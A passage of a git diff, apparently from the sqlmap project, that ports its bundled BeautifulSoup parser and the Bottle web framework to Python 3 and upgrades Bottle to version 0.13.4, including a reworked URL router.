self._lastRecursiveChild().next current = self.contents[0] - while current is not stopNode: + while current and current is not stopNode: yield current current = current.next @@ -967,8 +988,8 @@ def search(self, markup): if self._matches(markup, self.text): found = markup else: - raise Exception, "I don't know how to match against a %s" \ - % markup.__class__ + raise Exception("I don't know how to match against a %s" \ + % markup.__class__) return found def _matches(self, markup, matchAgainst): @@ -984,7 +1005,7 @@ def _matches(self, markup, matchAgainst): if isinstance(markup, Tag): markup = markup.name if markup and not isinstance(markup, basestring): - markup = unicode(markup) + markup = text_type(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. 
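The recursiveChildGenerator() change above (raise StopIteration replaced by a bare return) is the standard PEP 479 fix: from Python 3.7 on, a StopIteration escaping a generator body is converted into a RuntimeError instead of silently ending iteration. A short illustration under that assumption, with toy functions rather than BeautifulSoup code:

def bad_children(contents):
    # Pre-PEP 479 idiom: signal "nothing to yield" by raising StopIteration.
    # On Python 3.7+ this surfaces as RuntimeError when the generator is consumed.
    if not contents:
        raise StopIteration
    for item in contents:
        yield item

def good_children(contents):
    # PEP 479-safe: a plain return ends the generator cleanly.
    if not contents:
        return
    for item in contents:
        yield item

print(list(good_children([])))      # []
try:
    list(bad_children([]))
except RuntimeError as exc:         # "generator raised StopIteration" on 3.7+
    print(type(exc).__name__)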
@@ -994,8 +1015,8 @@ def _matches(self, markup, matchAgainst): elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isinstance(markup, basestring): - if isinstance(markup, unicode): - matchAgainst = unicode(matchAgainst) + if isinstance(markup, text_type): + matchAgainst = text_type(matchAgainst) else: matchAgainst = str(matchAgainst) @@ -1033,7 +1054,7 @@ def buildTagMap(default, *args): # Now, the parser classes. -class BeautifulStoneSoup(Tag, SGMLParser): +class BeautifulStoneSoup(Tag, sgmllib.SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the @@ -1057,9 +1078,9 @@ class BeautifulStoneSoup(Tag, SGMLParser): QUOTE_TAGS = {} PRESERVE_WHITESPACE_TAGS = [] - MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), + MARKUP_MASSAGE = [(re.compile(r'(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), - (re.compile('<!\s+([^<>]*)>'), + (re.compile(r'<!\s+([^<>]*)>'), lambda x: '<!' + x.group(1) + '>') ] @@ -1134,7 +1155,7 @@ class has some tricks for dealing with some HTML that kills self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) - SGMLParser.__init__(self) + sgmllib.SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() @@ -1159,7 +1180,7 @@ def convert_charref(self, name): def _feed(self, inDocumentEncoding=None, isHTML=False): # Convert the document to Unicode. markup = self.markup - if isinstance(markup, unicode): + if isinstance(markup, text_type): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: @@ -1183,7 +1204,7 @@ def _feed(self, inDocumentEncoding=None, isHTML=False): del(self.markupMassage) self.reset() - SGMLParser.feed(self, markup) + sgmllib.SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. 
self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: @@ -1196,7 +1217,7 @@ def __getattr__(self, methodName): if methodName.startswith('start_') or methodName.startswith('end_') \ or methodName.startswith('do_'): - return SGMLParser.__getattr__(self, methodName) + return sgmllib.SGMLParser.__getattr__(self, methodName) elif not methodName.startswith('__'): return Tag.__getattr__(self, methodName) else: @@ -1205,13 +1226,13 @@ def __getattr__(self, methodName): def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" - return self.SELF_CLOSING_TAGS.has_key(name) \ - or self.instanceSelfClosingTags.has_key(name) + return name in self.SELF_CLOSING_TAGS \ + or name in self.instanceSelfClosingTags def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 - SGMLParser.reset(self) + sgmllib.SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] @@ -1298,7 +1319,7 @@ def _smartPop(self, name): nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable = nestingResetTriggers != None - isResetNesting = self.RESET_NESTING_TAGS.has_key(name) + isResetNesting = name in self.RESET_NESTING_TAGS popTo = None inclusive = True for i in xrange(len(self.tagStack)-1, 0, -1): @@ -1311,7 +1332,7 @@ def _smartPop(self, name): if (nestingResetTriggers is not None and p.name in nestingResetTriggers) \ or (nestingResetTriggers is None and isResetNesting - and self.RESET_NESTING_TAGS.has_key(p.name)): + and p.name in self.RESET_NESTING_TAGS): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag @@ -1457,8 +1478,8 @@ def parse_declaration(self, i): self._toStringSubclass(data, CData) else: try: - j = SGMLParser.parse_declaration(self, i) - except SGMLParseError: + j = sgmllib.SGMLParser.parse_declaration(self, i) + except sgmllib.SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) @@ -1513,7 +1534,7 @@ class BeautifulSoup(BeautifulStoneSoup): BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): - if not kwargs.has_key('smartQuotesTo'): + if 'smartQuotesTo' not in kwargs: kwargs['smartQuotesTo'] = self.HTML_ENTITIES kwargs['isHTML'] = True BeautifulStoneSoup.__init__(self, *args, **kwargs) @@ -1568,7 +1589,7 @@ def __init__(self, *args, **kwargs): NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta - CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) + CHARSET_RE = re.compile(r"((^|;)\s*charset=)([^;]*)", re.M) def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, @@ -1770,9 +1791,9 @@ def __init__(self, markup, overrideEncodings=[], self._detectEncoding(markup, isHTML) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] - if markup == '' or isinstance(markup, unicode): + if markup == '' or isinstance(markup, text_type): self.originalEncoding = None - self.unicode = unicode(markup) + self.unicode = text_type(markup) return u = None @@ -1785,7 +1806,7 @@ def __init__(self, markup, overrideEncodings=[], if u: break # If no luck and we have auto-detection library, try that: - if not u and chardet and not isinstance(self.markup, unicode): + if not u and chardet and not isinstance(self.markup, text_type): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: @@ -1821,7 +1842,7 @@ def 
_convertFrom(self, proposed): "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ - (lambda(x): self._subMSChar(x.group(1)), + (lambda x: self._subMSChar(x.group(1)), markup) try: @@ -1829,7 +1850,7 @@ def _convertFrom(self, proposed): u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed - except Exception, e: + except Exception as e: # print "That didn't work!" # print e return None @@ -1858,7 +1879,7 @@ def _toUnicode(self, data, encoding): elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] - newdata = unicode(data, encoding) + newdata = text_type(data, encoding) return newdata def _detectEncoding(self, xml_data, isHTML=False): @@ -1871,50 +1892,50 @@ def _detectEncoding(self, xml_data, isHTML=False): elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' - xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') + xml_data = text_type(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' - xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') + xml_data = text_type(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' - xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') + xml_data = text_type(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' - xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') + xml_data = text_type(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' - xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') + xml_data = text_type(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' - xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') + xml_data = text_type(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' - xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') + xml_data = text_type(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' - xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') + xml_data = text_type(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' - xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') + xml_data = text_type(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass except: xml_encoding_match = None xml_encoding_match = re.compile( - '^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) + r'^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) if not xml_encoding_match and isHTML: - regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) + regexp = re.compile(r'<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) xml_encoding_match = regexp.search(xml_data) if xml_encoding_match is not None: xml_encoding = xml_encoding_match.groups()[0].lower() @@ -2009,6 +2030,5 @@ def _ebcdic_to_ascii(self, s): #By default, act as an HTML pretty-printer. 
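The UnicodeDammit hunks above mostly swap unicode() for text_type(), but the surrounding _detectEncoding() logic they touch is the interesting part: it sniffs a byte-order mark before trusting any declared or guessed encoding. A rough sketch of that BOM-sniffing step, with an illustrative helper name (sniff_bom) and only the common BOMs:

def sniff_bom(data):
    # Longer BOMs first, so UTF-32LE is not mistaken for UTF-16LE (both start with \xff\xfe)
    boms = (
        (b'\x00\x00\xfe\xff', 'utf-32be'),
        (b'\xff\xfe\x00\x00', 'utf-32le'),
        (b'\xef\xbb\xbf', 'utf-8'),
        (b'\xfe\xff', 'utf-16be'),
        (b'\xff\xfe', 'utf-16le'),
    )
    for bom, encoding in boms:
        if data.startswith(bom):
            return encoding, data[len(bom):]
    return None, data

print(sniff_bom(b'\xef\xbb\xbfhello'))   # ('utf-8', b'hello')
print(sniff_bom(b'no bom here'))         # (None, b'no bom here')

The ordering matters because the UTF-32LE BOM begins with the UTF-16LE one, which is the same reason the original code checks that bytes 2:4 are not '\x00\x00' before deciding on UTF-16LE.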
if __name__ == '__main__': - import sys soup = BeautifulSoup(sys.stdin) - print soup.prettify() + print(soup.prettify()) diff --git a/thirdparty/bottle/__init__.py b/thirdparty/bottle/__init__.py index 9e1072a9c4f..2ae28399f5f 100644 --- a/thirdparty/bottle/__init__.py +++ b/thirdparty/bottle/__init__.py @@ -1,8 +1 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - pass diff --git a/thirdparty/bottle/bottle.py b/thirdparty/bottle/bottle.py index 62c9010ea99..e0b3185d27d 100644 --- a/thirdparty/bottle/bottle.py +++ b/thirdparty/bottle/bottle.py @@ -1,77 +1,90 @@ #!/usr/bin/env python # -*- coding: utf-8 -*- +from __future__ import print_function """ Bottle is a fast and simple micro-framework for small web applications. It -offers request dispatching (Routes) with url parameter support, templates, +offers request dispatching (Routes) with URL parameter support, templates, a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and template engines - all in a single file and with no dependencies other than the Python Standard Library. Homepage and documentation: http://bottlepy.org/ -Copyright (c) 2012, Marcel Hellkamp. +Copyright (c) 2009-2024, Marcel Hellkamp. License: MIT (see LICENSE for details) """ -from __future__ import with_statement +import sys __author__ = 'Marcel Hellkamp' -__version__ = '0.12-dev' +__version__ = '0.13.4' __license__ = 'MIT' -# The gevent server adapter needs to patch some modules before they are imported -# This is why we parse the commandline parameters here but handle them later -if __name__ == '__main__': - from optparse import OptionParser - _cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app") - _opt = _cmd_parser.add_option - _opt("--version", action="store_true", help="show version number.") - _opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") - _opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") - _opt("-p", "--plugin", action="append", help="install additional plugin/s.") - _opt("--debug", action="store_true", help="start server in debug mode.") - _opt("--reload", action="store_true", help="auto-reload on file changes.") - _cmd_options, _cmd_args = _cmd_parser.parse_args() - if _cmd_options.server and _cmd_options.server.startswith('gevent'): - import gevent.monkey; gevent.monkey.patch_all() - -import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\ - os, re, subprocess, sys, tempfile, threading, time, urllib, warnings +############################################################################### +# Command-line interface ###################################################### +############################################################################### +# INFO: Some server adapters need to monkey-patch std-lib modules before they +# are imported. This is why some of the command-line handling is done here, but +# the actual call to _main() is at the end of the file. 
-from datetime import date as datedate, datetime, timedelta -from tempfile import TemporaryFile -from traceback import format_exc, print_exc -try: from json import dumps as json_dumps, loads as json_lds -except ImportError: # pragma: no cover - try: from simplejson import dumps as json_dumps, loads as json_lds - except ImportError: - try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds - except ImportError: - def json_dumps(data): - raise ImportError("JSON support requires Python 2.6 or simplejson.") - json_lds = json_dumps +def _cli_parse(args): # pragma: no coverage + from argparse import ArgumentParser + + parser = ArgumentParser(prog=args[0], usage="%(prog)s [options] package.module:app") + opt = parser.add_argument + opt("--version", action="store_true", help="show version number.") + opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") + opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") + opt("-p", "--plugin", action="append", help="install additional plugin/s.") + opt("-c", "--conf", action="append", metavar="FILE", + help="load config values from FILE.") + opt("-C", "--param", action="append", metavar="NAME=VALUE", + help="override config values.") + opt("--debug", action="store_true", help="start server in debug mode.") + opt("--reload", action="store_true", help="auto-reload on file changes.") + opt('app', help='WSGI app entry point.', nargs='?') + + cli_args = parser.parse_args(args[1:]) + + return cli_args, parser +def _cli_patch(cli_args): # pragma: no coverage + parsed_args, _ = _cli_parse(cli_args) + opts = parsed_args + if opts.server: + if opts.server.startswith('gevent'): + import gevent.monkey + gevent.monkey.patch_all() + elif opts.server.startswith('eventlet'): + import eventlet + eventlet.monkey_patch() -# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities. -# It ain't pretty but it works... Sorry for the mess. -py = sys.version_info -py3k = py >= (3,0,0) -py25 = py < (2,6,0) -py31 = (3,1,0) <= py < (3,2,0) +if __name__ == '__main__': + _cli_patch(sys.argv) + +############################################################################### +# Imports and Python 2/3 unification ########################################## +############################################################################### -# Workaround for the missing "as" keyword in py3k. -def _e(): return sys.exc_info()[1] +import base64, calendar, email.utils, functools, hmac, itertools,\ + mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib + +from types import FunctionType +from datetime import date as datedate, datetime, timedelta +from tempfile import NamedTemporaryFile +from traceback import format_exc, print_exc +from unicodedata import normalize -# Workaround for the "print is a keyword/function" Python 2/3 dilemma -# and a fallback for mod_wsgi (resticts stdout/err attribute access) try: - _stdout, _stderr = sys.stdout.write, sys.stderr.write -except IOError: - _stdout = lambda x: sys.stdout.write(x) - _stderr = lambda x: sys.stderr.write(x) + from ujson import dumps as json_dumps, loads as json_lds +except ImportError: + from json import dumps as json_dumps, loads as json_lds + +py = sys.version_info +py3k = py.major > 2 # Lots of stdlib and builtin differences. 
if py3k: @@ -80,75 +93,113 @@ def _e(): return sys.exc_info()[1] from urllib.parse import urljoin, SplitResult as UrlSplitResult from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote urlunquote = functools.partial(urlunquote, encoding='latin1') - from http.cookies import SimpleCookie - from collections import MutableMapping as DictMixin + from http.cookies import SimpleCookie, Morsel, CookieError + from collections.abc import MutableMapping as DictMixin + from types import ModuleType as new_module import pickle from io import BytesIO + import configparser + from datetime import timezone + UTC = timezone.utc + # getfullargspec was deprecated in 3.5 and un-deprecated in 3.6 + # getargspec was deprecated in 3.0 and removed in 3.11 + from inspect import getfullargspec + def getargspec(func): + spec = getfullargspec(func) + kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs) + return kwargs, spec[1], spec[2], spec[3] + basestring = str unicode = str json_loads = lambda s: json_lds(touni(s)) callable = lambda x: hasattr(x, '__call__') imap = map -else: # 2.x + + def _raise(*a): + raise a[0](a[1]).with_traceback(a[2]) +else: # 2.x + warnings.warn("Python 2 support will be dropped in Bottle 0.14", DeprecationWarning) import httplib import thread from urlparse import urljoin, SplitResult as UrlSplitResult from urllib import urlencode, quote as urlquote, unquote as urlunquote - from Cookie import SimpleCookie + from Cookie import SimpleCookie, Morsel, CookieError from itertools import imap import cPickle as pickle + from imp import new_module from StringIO import StringIO as BytesIO - if py25: - msg = "Python 2.5 support may be dropped in future versions of Bottle." - warnings.warn(msg, DeprecationWarning) - from UserDict import DictMixin - def next(it): return it.next() - bytes = str - else: # 2.6, 2.7 - from collections import MutableMapping as DictMixin + import ConfigParser as configparser + from collections import MutableMapping as DictMixin + from inspect import getargspec + from datetime import tzinfo + + class _UTC(tzinfo): + def utcoffset(self, dt): return timedelta(0) + def tzname(self, dt): return "UTC" + def dst(self, dt): return timedelta(0) + UTC = _UTC() + + unicode = unicode json_loads = json_lds + exec(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec')) + # Some helpers for string/byte handling def tob(s, enc='utf8'): - return s.encode(enc) if isinstance(s, unicode) else bytes(s) + if isinstance(s, unicode): + return s.encode(enc) + return b'' if s is None else bytes(s) + + def touni(s, enc='utf8', err='strict'): - return s.decode(enc, err) if isinstance(s, bytes) else unicode(s) + if isinstance(s, bytes): + return s.decode(enc, err) + return unicode("" if s is None else s) + + tonat = touni if py3k else tob -# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense). -# 3.1 needs a workaround. -if py31: - from io import TextIOWrapper - class NCTextIOWrapper(TextIOWrapper): - def close(self): pass # Keep wrapped buffer open. -# File uploads (which are implemented as empty FiledStorage instances...) -# have a negative truth value. That makes no sense, here is a fix. 
-class FieldStorage(cgi.FieldStorage): - def __nonzero__(self): return bool(self.list or self.file) - if py3k: __bool__ = __nonzero__ +def _stderr(*args): + try: + print(*args, file=sys.stderr) + except (IOError, AttributeError): + pass # Some environments do not allow printing (mod_wsgi) + # A bug in functools causes it to break if the wrapper is an instance method def update_wrapper(wrapper, wrapped, *a, **ka): - try: functools.update_wrapper(wrapper, wrapped, *a, **ka) - except AttributeError: pass - - + try: + functools.update_wrapper(wrapper, wrapped, *a, **ka) + except AttributeError: + pass # These helpers are used at module level and need to be defined first. # And yes, I know PEP-8, but sometimes a lower-case classname makes more sense. -def depr(message): - warnings.warn(message, DeprecationWarning, stacklevel=3) -def makelist(data): # This is just to handy - if isinstance(data, (tuple, list, set, dict)): return list(data) - elif data: return [data] - else: return [] +def depr(major, minor, cause, fix, stacklevel=3): + text = "Warning: Use of deprecated feature or API. (Deprecated in Bottle-%d.%d)\n"\ + "Cause: %s\n"\ + "Fix: %s\n" % (major, minor, cause, fix) + if DEBUG == 'strict': + raise DeprecationWarning(text) + warnings.warn(text, DeprecationWarning, stacklevel=stacklevel) + return DeprecationWarning(text) + + +def makelist(data): # This is just too handy + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] class DictProperty(object): - ''' Property that maps to a key in a local dict-like attribute. ''' + """ Property that maps to a key in a local dict-like attribute. """ + def __init__(self, attr, key=None, read_only=False): self.attr, self.key, self.read_only = attr, key, read_only @@ -173,11 +224,12 @@ def __delete__(self, obj): class cached_property(object): - ''' A property that is only computed once per instance and then replaces + """ A property that is only computed once per instance and then replaces itself with an ordinary attribute. Deleting the attribute resets the - property. ''' + property. """ def __init__(self, func): + update_wrapper(self, func) self.func = func def __get__(self, obj, cls): @@ -187,7 +239,8 @@ def __get__(self, obj, cls): class lazy_attribute(object): - ''' A property that caches itself to the class object. ''' + """ A property that caches itself to the class object. """ + def __init__(self, func): functools.update_wrapper(self, func, updated=[]) self.getter = func @@ -198,12 +251,8 @@ def __get__(self, obj, cls): return value - - - - ############################################################################### -# Exceptions and Events ######################################################## +# Exceptions and Events ####################################################### ############################################################################### @@ -211,11 +260,6 @@ class BottleException(Exception): """ A base class for exceptions used by bottle. """ pass - - - - - ############################################################################### # Routing ###################################################################### ############################################################################### @@ -229,19 +273,31 @@ class RouteReset(BottleException): """ If raised by a plugin or request handler, the route is reset and all plugins are re-applied. 
""" -class RouterUnknownModeError(RouteError): pass + +class RouterUnknownModeError(RouteError): + + pass class RouteSyntaxError(RouteError): - """ The route parser found something not supported by this router """ + """ The route parser found something not supported by this router. """ class RouteBuildError(RouteError): - """ The route could not been built """ + """ The route could not be built. """ + + +def _re_flatten(p): + """ Turn all capturing groups in a regular expression pattern into + non-capturing groups. """ + if '(' not in p: + return p + return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))', lambda m: m.group(0) if + len(m.group(1)) % 2 else m.group(1) + '(?:', p) class Router(object): - ''' A Router is an ordered collection of route->target pairs. It is used to + """ A Router is an ordered collection of route->target pairs. It is used to efficiently match WSGI requests against a number of routes and return the first target that satisfies the request. The target may be anything, usually a string, ID or callable object. A route consists of a path-rule @@ -250,177 +306,212 @@ class Router(object): The path-rule is either a static path (e.g. `/contact`) or a dynamic path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax and details on the matching order are described in docs:`routing`. - ''' + """ default_pattern = '[^/]+' - default_filter = 're' - #: Sorry for the mess. It works. Trust me. - rule_syntax = re.compile('(\\\\*)'\ - '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\ - '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\ - '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))') + default_filter = 're' + + #: The current CPython regexp implementation does not allow more + #: than 99 matching groups per regular expression. + _MAX_GROUPS_PER_PATTERN = 99 def __init__(self, strict=False): - self.rules = {} # A {rule: Rule} mapping - self.builder = {} # A rule/name->build_info mapping - self.static = {} # Cache for static routes: {path: {method: target}} - self.dynamic = [] # Cache for dynamic routes. See _compile() + self.rules = [] # All rules in order + self._groups = {} # index of regexes to find them in dyna_routes + self.builder = {} # Data structure for the url builder + self.static = {} # Search structure for static routes + self.dyna_routes = {} + self.dyna_regexes = {} # Search structure for dynamic routes #: If true, static routes are no longer checked first. self.strict_order = strict - self.filters = {'re': self.re_filter, 'int': self.int_filter, - 'float': self.float_filter, 'path': self.path_filter} - - def re_filter(self, conf): - return conf or self.default_pattern, None, None - - def int_filter(self, conf): - return r'-?\d+', int, lambda x: str(int(x)) - - def float_filter(self, conf): - return r'-?[\d.]+', float, lambda x: str(float(x)) - - def path_filter(self, conf): - return r'.+?', None, None + self.filters = { + 're': lambda conf: (_re_flatten(conf or self.default_pattern), + None, None), + 'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))), + 'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))), + 'path': lambda conf: (r'.+?', None, None) + } def add_filter(self, name, func): - ''' Add a filter. The provided function is called with the configuration + """ Add a filter. The provided function is called with the configuration string as parameter and must return a (regexp, to_python, to_url) tuple. - The first element is a string, the last two are callables or None. ''' + The first element is a string, the last two are callables or None. 
""" self.filters[name] = func - def parse_rule(self, rule): - ''' Parses a rule into a (name, filter, conf) token stream. If mode is - None, name contains a static rule part. ''' + rule_syntax = re.compile('(\\\\*)' + '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)' + '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)' + '(?::((?:\\\\.|[^\\\\>])+)?)?)?>))') + + def _itertokens(self, rule): offset, prefix = 0, '' for match in self.rule_syntax.finditer(rule): prefix += rule[offset:match.start()] g = match.groups() - if len(g[0])%2: # Escaped wildcard + if g[2] is not None: + depr(0, 13, "Use of old route syntax.", + "Use <name> instead of :name in routes.", + stacklevel=4) + if len(g[0]) % 2: # Escaped wildcard prefix += match.group(0)[len(g[0]):] offset = match.end() continue - if prefix: yield prefix, None, None - name, filtr, conf = g[1:4] if not g[2] is None else g[4:7] - if not filtr: filtr = self.default_filter - yield name, filtr, conf or None + if prefix: + yield prefix, None, None + name, filtr, conf = g[4:7] if g[2] is None else g[1:4] + yield name, filtr or 'default', conf or None offset, prefix = match.end(), '' if offset <= len(rule) or prefix: - yield prefix+rule[offset:], None, None + yield prefix + rule[offset:], None, None def add(self, rule, method, target, name=None): - ''' Add a new route or replace the target for an existing route. ''' - if rule in self.rules: - self.rules[rule][method] = target - if name: self.builder[name] = self.builder[rule] - return - - target = self.rules[rule] = {method: target} - - # Build pattern and other structures for dynamic routes - anons = 0 # Number of anonymous wildcards - pattern = '' # Regular expression pattern - filters = [] # Lists of wildcard input filters - builder = [] # Data structure for the URL builder + """ Add a new rule or replace the target for an existing rule. """ + anons = 0 # Number of anonymous wildcards found + keys = [] # Names of keys + pattern = '' # Regular expression pattern with named groups + filters = [] # Lists of wildcard input filters + builder = [] # Data structure for the URL builder is_static = True - for key, mode, conf in self.parse_rule(rule): + + for key, mode, conf in self._itertokens(rule): if mode: is_static = False + if mode == 'default': mode = self.default_filter mask, in_filter, out_filter = self.filters[mode](conf) - if key: - pattern += '(?P<%s>%s)' % (key, mask) - else: + if not key: pattern += '(?:%s)' % mask - key = 'anon%d' % anons; anons += 1 + key = 'anon%d' % anons + anons += 1 + else: + pattern += '(?P<%s>%s)' % (key, mask) + keys.append(key) if in_filter: filters.append((key, in_filter)) builder.append((key, out_filter or str)) elif key: pattern += re.escape(key) builder.append((None, key)) + self.builder[rule] = builder if name: self.builder[name] = builder if is_static and not self.strict_order: - self.static[self.build(rule)] = target + self.static.setdefault(method, {}) + self.static[method][self.build(rule)] = (target, None) return - def fpat_sub(m): - return m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:' - flat_pattern = re.sub(r'(\\*)(\(\?P<[^>]*>|\((?!\?))', fpat_sub, pattern) - try: - re_match = re.compile('^(%s)$' % pattern).match - except re.error: - raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e())) - - def match(path): - """ Return an url-argument dictionary. 
""" - url_args = re_match(path).groupdict() - for name, wildcard_filter in filters: - try: - url_args[name] = wildcard_filter(url_args[name]) - except ValueError: - raise HTTPError(400, 'Path has wrong format.') - return url_args + re_pattern = re.compile('^(%s)$' % pattern) + re_match = re_pattern.match + except re.error as e: + raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, e)) + + if filters: + + def getargs(path): + url_args = re_match(path).groupdict() + for name, wildcard_filter in filters: + try: + url_args[name] = wildcard_filter(url_args[name]) + except ValueError: + raise HTTPError(400, 'Path has wrong format.') + return url_args + elif re_pattern.groupindex: + + def getargs(path): + return re_match(path).groupdict() + else: + getargs = None - try: - combined = '%s|(^%s$)' % (self.dynamic[-1][0].pattern, flat_pattern) - self.dynamic[-1] = (re.compile(combined), self.dynamic[-1][1]) - self.dynamic[-1][1].append((match, target)) - except (AssertionError, IndexError): # AssertionError: Too many groups - self.dynamic.append((re.compile('(^%s$)' % flat_pattern), - [(match, target)])) - return match + flatpat = _re_flatten(pattern) + whole_rule = (rule, flatpat, target, getargs) + + if (flatpat, method) in self._groups: + if DEBUG: + msg = 'Route <%s %s> overwrites a previously defined route' + warnings.warn(msg % (method, rule), RuntimeWarning, stacklevel=3) + self.dyna_routes[method][ + self._groups[flatpat, method]] = whole_rule + else: + self.dyna_routes.setdefault(method, []).append(whole_rule) + self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1 + + self._compile(method) + + def _compile(self, method): + all_rules = self.dyna_routes[method] + comborules = self.dyna_regexes[method] = [] + maxgroups = self._MAX_GROUPS_PER_PATTERN + for x in range(0, len(all_rules), maxgroups): + some = all_rules[x:x + maxgroups] + combined = (flatpat for (_, flatpat, _, _) in some) + combined = '|'.join('(^%s$)' % flatpat for flatpat in combined) + combined = re.compile(combined).match + rules = [(target, getargs) for (_, _, target, getargs) in some] + comborules.append((combined, rules)) def build(self, _name, *anons, **query): - ''' Build an URL by filling the wildcards in a rule. ''' + """ Build an URL by filling the wildcards in a rule. """ builder = self.builder.get(_name) - if not builder: raise RouteBuildError("No route with that name.", _name) + if not builder: + raise RouteBuildError("No route with that name.", _name) try: - for i, value in enumerate(anons): query['anon%d'%i] = value - url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder]) - return url if not query else url+'?'+urlencode(query) - except KeyError: - raise RouteBuildError('Missing URL argument: %r' % _e().args[0]) + for i, value in enumerate(anons): + query['anon%d' % i] = value + url = ''.join([f(query.pop(n)) if n else f for (n, f) in builder]) + return url if not query else url + '?' + urlencode(query) + except KeyError as E: + raise RouteBuildError('Missing URL argument: %r' % E.args[0]) def match(self, environ): - ''' Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). 
